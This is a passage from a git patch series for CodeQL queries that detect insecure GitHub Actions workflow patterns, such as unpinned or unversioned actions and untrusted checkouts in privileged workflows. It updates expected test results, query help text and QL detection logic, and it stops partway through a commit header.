Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | -| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | -| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | -| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | -| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | -| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | -| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | From df0c1e28e713c83b2a29f97bc6aaa6fa199c1c0e Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:49:43 -0400 Subject: [PATCH 626/707] stub out qlhelp --- .../Security/CWE-829/UnversionedImmutableAction.md | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index eab708f8602e..754fe75b62be 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -1,27 +1,29 @@ -# Unpinned tag for 3rd party Action in workflow +# Unversioned Immutable Action ## Description -Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples ### Incorrect Usage ```yaml -- uses: tj-actions/changed-files@v44 +- uses: actions/checkout@some-tag +- uses: actions/checkout@2.x.x ``` ### Correct Usage ```yaml -- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +- uses: actions/checkout@4.0.0 ``` ## References -- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) +- [Consuming immutable actions]() From f7162228012cb27341f759c9d05fdeb3c554bba0 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:27:53 -0400 Subject: [PATCH 627/707] remove octokit from trusted orgs for now - reduce PR scope --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 2111cc118a97..10c21bc368b5 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 030c08e5aee4f5138dc8b9bd670fe3afd7fb1019 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:54:27 -0400 Subject: [PATCH 628/707] update expected from example originating from main branch merge --- .../Security/CWE-829/UnversionedImmutableAction.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index df23709b5422..6d30e6f4cbeb 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -20,3 +20,4 @@ | .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | | .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout | From 40ec9d623d71afedc0cd0bdd64be30d987790bfe Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 24 Oct 2024 16:55:44 -0400 Subject: [PATCH 629/707] update existing tests to accomdate for trips from octokit2 example added to support unversioned immutable action ql --- .../Security/CWE-829/UnpinnedActionsTag.expected | 3 +++ .../Security/CWE-829/UntrustedCheckoutCritical.expected | 6 ++++++ .../Security/CWE-829/UntrustedCheckoutHigh.expected | 1 + 3 files changed, 10 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0457fd7afaac..aa19c08f2f06 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,6 +10,9 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de81..d36340d6bcca 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -93,6 +93,12 @@ edges | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | +| .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:37:9:38:37 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b37479..8e3ecaee5476 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -5,6 +5,7 @@ | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 6802cd2398adf5f5b90b889c5575ff60d2237eda Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:18 +0200 Subject: [PATCH 630/707] Improve checkout trigger events checks --- .../security/UntrustedCheckoutQuery.qll | 56 ++++++++----------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + 3 files changed, 25 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 01da214b6eaa..ffbb6fac2637 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and + //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,29 +209,24 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|branch|ref).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } @@ -247,27 +242,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|sha|commit).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } @@ -283,7 +273,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -307,7 +297,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -328,7 +318,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -351,7 +341,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - this.getATriggerEvent().getName() = checkoutTriggers() and + //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index be3b02ae4777..07602af0ac4a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -48,6 +48,7 @@ where // the checkout occurs in a privileged context inPrivilegedContext(poisonable, event) and inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index e130ba5dbb8a..39cd18600975 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -24,6 +24,7 @@ where not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and From d8f79818d6ffd1f572bf1a88bad78124785acd3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:47 +0200 Subject: [PATCH 631/707] Improve extraction of Output/Env assignments --- ql/lib/codeql/actions/Bash.qll | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index c1e038069eb1..fda27732828e 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -256,20 +256,20 @@ class BashShellScript extends ShellScript { override predicate getAWriteToGitHubEnv(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubOutput(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubPath(string data) { - Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + Bash::extractFileWrite(this, "GITHUB_PATH", data) } override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { @@ -542,12 +542,12 @@ module Bash { blockFileWrite(script, cmd, file, content, filters) } - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { // single line assignment exists(string file_expr, string raw_content | isParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and content = trimQuotes(raw_content) ) or @@ -566,12 +566,12 @@ module Bash { cmd = "add-path" and content = value ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) ) or // multiline assignment exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and isParameterExpansion(file_expr, file_var, _, _) and content = trimQuotes(raw_content) ) From 922ae57abaf8b68e4995c942aa7ef15796f66044 Mon Sep 17 00:00:00 2001 From: 